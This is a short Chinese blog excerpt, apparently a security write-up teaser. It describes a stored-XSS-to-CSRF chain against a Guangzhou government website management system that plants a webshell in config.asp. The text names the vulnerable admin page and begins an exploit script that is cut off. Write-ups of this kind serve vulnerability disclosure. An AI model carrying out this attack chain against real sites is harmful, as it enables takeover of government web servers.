• 广州网域高科政府网站管理系统csrf getshell

    AdminAdmin 2020-05-25

    漏洞分析 前台发表文章处未过滤xss标签,管理员后台http://yir6.cn/CheckNews1.asp时对标题未过滤,可以xss攻击,结合系统配置处的config.asp 插马,可以 csrf getshell。 攻击流程,如图 exploit: [php] var request = false; if(window.XMLHttpRequest)...

    已有124人围观 ,发现 0个评论
1
最新留言
请关注微信公众号
微信二维码
不容错过
Powered By 蚁人博客